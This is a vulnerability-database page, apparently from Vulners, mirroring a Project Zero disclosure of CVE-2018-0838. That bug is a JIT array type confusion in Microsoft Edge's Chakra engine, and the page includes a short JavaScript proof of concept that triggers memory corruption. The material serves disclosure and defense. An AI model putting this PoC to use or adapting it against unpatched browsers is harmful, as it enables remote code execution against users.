Vulners
Lucene search
Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion
🗓️ 15 Feb 2018 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 47 Views
| Reporter | Title | Published | Views | Family All 55 |
|---|---|---|---|---|
 | Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploit | 15 Feb 201800:00 | – | zdt |
 | CVE-2018-0838 | 15 Feb 201800:00 | – | circl |
 | Microsoft Edge and ChakraCore Remote Memory Corruption Vulnerability (CNVD-2018-03517) | 14 Feb 201800:00 | – | cnvd |
 | Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0838) | 13 Feb 201800:00 | – | checkpoint_advisories |
 | CVE-2018-0838 | 15 Feb 201802:00 | – | cve |
 | CVE-2018-0838 | 15 Feb 201802:00 | – | cvelist |
 | ChakraCore RCE Vulnerability | 13 May 202201:18 | – | github |
 | February 13, 2018—KB4074588 (OS Build 16299.248) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074590 (OS Build 14393.2068) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074591 (OS Build 10586.1417) | 13 Feb 201808:00 | – | mskb |
10
`Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor
CVE-2018-0838
This is similar to the previous issues 1457, <a href="/p/project-zero/issues/detail?id=1459" title="Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse" class="closed_ref" rel="nofollow"> 1459 </a>(MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions which are not checked by CheckJsArrayKills.
PoC:
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Feb 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.79299